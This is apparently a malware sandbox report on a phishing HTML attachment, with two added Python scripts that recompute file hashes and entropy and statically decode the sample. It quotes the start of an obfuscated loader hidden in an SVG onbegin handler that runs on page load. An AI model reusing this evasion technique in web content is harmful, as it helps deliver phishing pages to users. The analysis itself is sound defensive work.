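The Size, Entropy (8bit) and hash columns above are the static metrics a triage script should reproduce before trusting a report, and the 21-byte "Site is coming soon!!" artifact is small enough to check by hand. The Python below is an added example, not Joe Sandbox's own code: it recomputes 8-bit Shannon entropy and the four hashes for that artifact (its bytes are taken from the report's preview; the file has no line terminator) and flags high-entropy data as likely packed or encrypted. The 7.0 bits/byte cut-off is this example's own assumption, not the sandbox's rule; the low values reported for the LNK files (about 4.0) and the jQuery copy (5.29) are what plain text and shortcut structures normally score. The same function applied to a known-good jquery-3.6.0.min.js from jquery.org gives a SHA-256 to compare against the one listed above, which is the quick way to rule out a trojanized library copy.

```python
import hashlib
import math
from collections import Counter

# Constructed from the report: the 21-byte dropped file whose preview reads
# "Site is coming soon!!" (ASCII text, no line terminators, so no trailing newline).
COMING_SOON = b"Site is coming soon!!"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for one repeated byte value,
    8.0 for a uniform distribution over all 256 byte values."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Heuristic: compressed or encrypted payloads sit close to 8 bits/byte.
    The 7.0 cut-off is this example's own choice, not the sandbox's rule."""
    return shannon_entropy(data) >= threshold


def describe(data: bytes) -> dict:
    """The static columns the report prints for a dropped file, recomputed locally."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "encrypted": looks_packed(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


if __name__ == "__main__":
    # Compare the printed hashes with the MD5/SHA1/SHA-256/SHA-512 listed
    # for this artifact in the report; the entropy should match 3.42733349...
    for key, value in describe(COMING_SOON).items():
        print(f"{key}: {value}")
```

Run it against any dropped file (`describe(open(path, "rb").read())`) and diff the output with the report's row; a mismatch means you are not looking at the same bytes the sandbox saw.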
                Static File Info
                File type:HTML document, ASCII text
                Entropy (8bit):3.5110463544830437
                TrID:
                File name:Tanveer Sethi_Voice-REC-481680954386772.html
                File size:6'356 bytes
                MD5:d44cce885742160c3ce552280eed56d2
                SHA1:66609d4d0e85566900a5265bf7c76bbc656c1ff1
                SHA256:0f7f173e6f70c4958b783074205e8698290bfdd7f3c2811f3df208ed099b92ee
                SHA512:10e34d5d9f6a992e063a3580a5ed5d8b9e7936fe0b110e5c183bba14d2098e157da0e6a06c9fa5027d62e6015c55c818c433d325fb1adb0003eeaa520444a960
                SSDEEP:192:GB353q/3Vz3ozdfTfGlxX1Em84yT3RcLzQVTN3:Epa/FzSbGTudNX/
                TLSH:DBD1FBD4A700D2B1953A58BE7C5F2948128E1309FBE231E107EB9B2407E21DEBBB4C5D
                File Content Preview:. <!Doctype html><svg><animate attributeName="x" onbegin='let vtgykfpqdr = `%3c.%21.%44.%4f.%43.%54.%59.%50.%45.%20.%68.%74.%6d.%6c.%3e.%0A.%3c.%68.%74.%6d.%6c.%20.%6c.%61.%6e.%67.%3d.%22.%65.%6e.%22.%3e.%0A.%3c.%68.%65.%61.%64.%3e.%0A.%3c.%73.%63.
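The preview shows the whole trick in one line: the sample is an SVG `<animate>` element whose `onbegin` handler (an SMIL event that fires when the animation starts, with no user interaction) holds a template literal of percent-encoded bytes separated by dots. The dots break naive `%xx` pattern matches and `decodeURIComponent`-style scanners, but they carry no information, so the payload can be recovered statically by keeping only the `%xx` tokens. The Python below is an added example, not code from the sample or from Joe Sandbox: it pulls inline `on*` handlers out of HTML, finds template literals inside them, decodes the dotted encoding without executing anything, and reports whether the decoded text is itself a full HTML document, which is what the report's "HTML Script injector" and "javascript redirector / loader" signatures describe. The constructed input is the exact prefix visible in the preview above (the literal is truncated there, so only the first 43 bytes of the real payload are decoded), and the decoder also handles plain undotted percent-encoding.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample: the start of the analysed file exactly as the report's
# "File Content Preview" shows it. The template literal is cut off there, so
# this blob is only the visible prefix of the real payload, not all of it.
SAMPLE_HTML = (
    "<!Doctype html><svg><animate attributeName=\"x\" onbegin='let vtgykfpqdr = `"
    "%3c.%21.%44.%4f.%43.%54.%59.%50.%45.%20.%68.%74.%6d.%6c.%3e.%0A."
    "%3c.%68.%74.%6d.%6c.%20.%6c.%61.%6e.%67.%3d.%22.%65.%6e.%22.%3e.%0A."
    "%3c.%68.%65.%61.%64.%3e.%0A.%3c.%73.%63."
    "`'"
)

# Inline event handler attributes such as onbegin='...' or onload="...".
HANDLER_RE = re.compile(r"""\bon(\w+)\s*=\s*(['"])(.*?)\2""", re.DOTALL | re.IGNORECASE)
# JavaScript template literals; the encoded payload lives inside one of these.
TEMPLATE_RE = re.compile(r"`([^`]*)`")
# One percent-encoded byte. Everything between tokens (the dots) is filler.
TOKEN_RE = re.compile(r"%[0-9A-Fa-f]{2}")


def decode_dotted_percent(blob: str) -> str:
    """Decode a %xx.%xx.%xx... string by keeping only the %xx tokens.

    Because only the tokens are read, this also decodes plain percent-encoding
    and ignores whatever other separator the author chose instead of dots.
    """
    return unquote("".join(TOKEN_RE.findall(blob)))


def find_handlers(html: str) -> list[tuple[str, str]]:
    """Return (event name, handler source) for every inline on* attribute."""
    return [(m.group(1).lower(), m.group(3)) for m in HANDLER_RE.finditer(html)]


def triage(html: str) -> list[dict]:
    """Find encoded blobs in inline handlers and decode them statically.

    Nothing is executed: the decoded text is returned for inspection, which is
    enough to see whether the handler is a loader for a second HTML document.
    """
    findings = []
    for event, code in find_handlers(html):
        for blob in TEMPLATE_RE.findall(code):
            tokens = TOKEN_RE.findall(blob)
            if len(tokens) < 8:  # too short to be a hidden payload
                continue
            decoded = decode_dotted_percent(blob)
            findings.append({
                "event": event,
                "encoded_bytes": len(tokens),
                "decoded": decoded,
                # A decoded blob that is itself a complete HTML document means
                # the handler replaces or injects the page rather than merely
                # scripting it: the loader pattern the report's signatures flag.
                "is_html_document": decoded.lstrip().lower().startswith("<!doctype html"),
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_HTML):
        print(finding["event"], finding["encoded_bytes"], finding["is_html_document"])
        print(finding["decoded"])
```

On the preview's prefix the decoded text is `<!DOCTYPE html>`, `<html lang="en">`, `<head>` and the start of a `<sc` tag, i.e. a second, self-contained page hidden inside the first. Run `triage()` on the full sample to see the rest of that document and the domain it contacts; do it on the file's bytes, never in a browser.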